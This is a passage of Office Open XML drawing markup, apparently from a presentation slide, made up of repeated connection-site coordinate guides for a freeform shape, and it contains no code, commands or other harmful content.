              <a:gd name="connsiteY98" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3937856 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3901461 h 6858000"/>
